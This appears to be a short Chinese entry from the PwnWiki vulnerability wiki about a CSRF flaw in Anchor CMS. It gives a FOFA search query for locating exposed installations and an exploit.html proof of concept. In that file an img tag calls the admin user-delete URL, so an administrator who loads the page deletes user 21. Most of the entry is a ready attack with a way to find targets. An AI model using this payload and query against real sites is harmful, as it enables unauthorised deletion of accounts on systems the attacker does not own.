免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
,
FOFA
"Anchor CMS" && body="themes/default/img/favicon.png"
POC
Anchor CMS使用Get方法进行敏感操作,可以使用exploit.html进行删除用户等操作。
exploit.html
<img src="http://target/anchor/index.php/admin/users/delete/21">
当管理员点击时删除ID为21的用户。
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
